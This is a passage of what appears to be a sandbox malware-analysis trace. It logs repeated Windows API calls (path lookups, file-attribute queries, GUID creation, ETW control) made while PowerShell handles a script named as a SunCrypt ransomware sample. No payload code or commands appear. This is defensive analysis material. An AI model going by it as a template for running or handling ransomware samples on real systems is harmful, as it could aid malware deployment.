(pv=0x427a048) [0100.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.901] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.901] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.901] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.901] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.902] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.902] EtwEventActivityIdControl () returned 0x0 [0100.902] EtwEventActivityIdControl () returned 0x0 [0100.902] EtwEventActivityIdControl () returned 0x0 [0100.902] EtwEventActivityIdControl () returned 0x0 [0100.902] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x4fd61319, Data2=0x1769, Data3=0x4737, Data4=([0]=0x9c, [1]=0x78, [2]=0x13, [3]=0x2b, [4]=0x4d, [5]=0xa6, [6]=0x93, [7]=0xc6))) returned 0x0 [0100.903] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.903] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.903] 
CoTaskMemFree (pv=0x427a048) [0100.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0100.903] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0100.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.903] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] CoCreateGuid (in: pguid=0x4ebecf8 | out: 
pguid=0x4ebecf8*(Data1=0xb4d1eaf5, Data2=0xac71, Data3=0x469c, Data4=([0]=0xad, [1]=0x4a, [2]=0xe4, [3]=0x16, [4]=0x15, [5]=0x2a, [6]=0x1b, [7]=0x30))) returned 0x0 [0100.904] CoTaskMemAlloc (cb=0x2cc) returned 0x427a048 [0100.904] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x427a048, nSize=0x164 | out: lpBuffer="") returned 0x0 [0100.904] CoTaskMemFree (pv=0x427a048) [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] EtwEventActivityIdControl () returned 0x0 [0100.904] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0100.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0100.905] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0100.905] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0100.905] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0100.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, 
lpFilePart=0x0) returned 0x3b [0100.905] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.168] EtwEventActivityIdControl () returned 0x0 [0101.208] EtwEventActivityIdControl () returned 0x0 [0101.208] EtwEventActivityIdControl () returned 0x0 [0101.208] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb70778ad, Data2=0x7756, Data3=0x42dd, Data4=([0]=0x94, [1]=0xdc, [2]=0x43, [3]=0x11, [4]=0x47, [5]=0x80, [6]=0x9d, [7]=0xaf))) returned 0x0 [0101.209] CoTaskMemAlloc (cb=0x2cc) returned 0x2f8ac8 [0101.209] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2f8ac8, nSize=0x164 | out: lpBuffer="") returned 0x0 [0101.209] CoTaskMemFree (pv=0x2f8ac8) [0101.215] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701403145793) returned 1 [0101.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.215] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.215] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, 
ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.219] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701403515590) returned 1 [0101.219] EtwEventActivityIdControl () returned 0x0 [0101.219] EtwEventActivityIdControl () returned 0x0 [0101.219] EtwEventActivityIdControl () returned 0x0 [0101.220] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x8305ba5c, Data2=0x91a8, Data3=0x443d, Data4=([0]=0xbe, [1]=0xf8, [2]=0x66, [3]=0x8b, [4]=0xda, [5]=0x57, [6]=0x15, [7]=0x54))) returned 0x0 [0101.220] CoTaskMemAlloc (cb=0x2d0) returned 0x2f8ac8 [0101.220] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2f8ac8, nSize=0x166 | out: lpBuffer="") returned 0x0 [0101.220] CoTaskMemFree (pv=0x2f8ac8) [0101.220] EtwEventActivityIdControl () returned 0x0 [0101.220] EtwEventActivityIdControl () returned 0x0 [0101.220] EtwEventActivityIdControl () returned 0x0 [0101.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.221] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0101.221] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0101.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.224] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe844 | out: lpPerformanceCount=0x4ebe844*=1701404058793) returned 1 [0101.323] EtwEventActivityIdControl () returned 0x0 [0101.327] EtwEventActivityIdControl () returned 0x0 [0101.327] EtwEventActivityIdControl () returned 0x0 [0101.328] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0xcaa143d1, Data2=0xe547, Data3=0x4cef, Data4=([0]=0xb0, [1]=0xc5, [2]=0xf3, [3]=0x2e, [4]=0xd4, [5]=0x87, [6]=0xf, [7]=0x22))) returned 0x0 
[0101.328] CoTaskMemAlloc (cb=0x2d0) returned 0x2f8ac8 [0101.328] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2f8ac8, nSize=0x166 | out: lpBuffer="") returned 0x0 [0101.328] CoTaskMemFree (pv=0x2f8ac8) [0101.328] EtwEventActivityIdControl () returned 0x0 [0101.328] EtwEventActivityIdControl () returned 0x0 [0101.328] EtwEventActivityIdControl () returned 0x0 [0101.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0101.329] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0101.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, 
lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.530] EtwEventActivityIdControl () returned 0x0 [0101.585] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x114a0a32, Data2=0x2100, Data3=0x4bc1, Data4=([0]=0x95, [1]=0xdd, [2]=0xfe, [3]=0xeb, [4]=0x47, [5]=0x4f, [6]=0xc5, [7]=0x33))) returned 0x0 [0101.585] CoTaskMemAlloc (cb=0x2d0) returned 0x4280e80 [0101.585] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x166 | out: lpBuffer="") returned 0x0 [0101.585] CoTaskMemFree (pv=0x4280e80) [0101.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.585] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.586] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.586] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.587] EtwEventActivityIdControl () returned 0x0 [0101.587] EtwEventActivityIdControl () returned 0x0 [0101.587] EtwEventActivityIdControl () returned 0x0 [0101.587] EtwEventActivityIdControl () returned 0x0 [0101.587] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7d540dee, Data2=0xd500, Data3=0x42f1, Data4=([0]=0x93, [1]=0x45, [2]=0xc7, [3]=0x20, [4]=0x5a, [5]=0x23, [6]=0x5a, [7]=0x97))) returned 0x0 [0101.587] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.587] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.587] CoTaskMemFree (pv=0x4280e80) [0101.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0101.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.588] EtwEventActivityIdControl () returned 0x0 [0101.589] EtwEventActivityIdControl () returned 0x0 [0101.589] EtwEventActivityIdControl () returned 0x0 [0101.589] CoCreateGuid (in: pguid=0x4ebecf8 | out: pguid=0x4ebecf8*(Data1=0x90cb2e7d, Data2=0x22f, Data3=0x44c5, Data4=([0]=0x85, [1]=0x84, [2]=0x8f, [3]=0x7b, [4]=0x24, [5]=0x33, [6]=0x21, [7]=0x6))) returned 0x0 [0101.589] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.589] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.589] CoTaskMemFree (pv=0x4280e80) [0101.590] EtwEventActivityIdControl () returned 0x0 [0101.590] EtwEventActivityIdControl () returned 0x0 [0101.590] EtwEventActivityIdControl () returned 0x0 [0101.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, 
lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe568) returned 1 [0101.590] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe82c | out: lpFileInformation=0x4ebe82c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe564) returned 1 [0101.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.590] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.653] EtwEventActivityIdControl () returned 0x0 [0101.687] EtwEventActivityIdControl () returned 0x0 [0101.687] EtwEventActivityIdControl () returned 0x0 [0101.687] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xf200a478, Data2=0xb22c, Data3=0x45b5, Data4=([0]=0x91, [1]=0x6a, [2]=0xb8, [3]=0x72, [4]=0xd9, [5]=0x98, [6]=0x3c, [7]=0xde))) returned 0x0 [0101.688] CoTaskMemAlloc (cb=0x2d4) returned 0x4280e80 [0101.688] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4280e80, nSize=0x168 | out: lpBuffer="") returned 0x0 [0101.688] CoTaskMemFree 
(pv=0x4280e80) [0101.688] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701450464073) returned 1 [0101.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0101.688] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0101.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0101.688] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0101.689] SetThreadErrorMode (dwNewMode=0x0, 